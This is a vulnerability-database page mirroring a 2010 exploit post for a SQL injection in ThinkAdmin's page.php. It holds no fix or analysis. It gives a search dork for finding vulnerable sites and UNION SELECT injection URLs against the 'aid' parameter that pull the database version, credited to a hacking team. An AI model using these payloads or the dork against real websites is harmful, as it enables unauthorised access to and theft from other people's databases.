ThinkAdmin - 'page.php' SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1059127 漏洞类型
发布时间 2010-01-30 更新时间 2010-01-30
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/11296
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
==========================================================
###########################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Email : F.Hack@w.cn
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : ThinkAdmin
.:. Script Download: http://www.thinkadmin.net/
.:. Bug Type : Sql Injection[Mysql]
.:. Dork : Powered by ThinkAdmin
.:. Date : 30/1/2010

#############################################

===[ Exploit ]===

www.site.com/page.php?id=21&aid=12[SQL INJECTION]&s=3

www.site.com/page.php?id=21&aid=-12'+union+select+1,version(),3,4,5,6,7,8-- -&s=3

===[ Example ]===

http://server/page.php?id=21&aid=-12'union+select+1,version(),3,4,5,6,7,8-- -&s=3

#############################################

Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack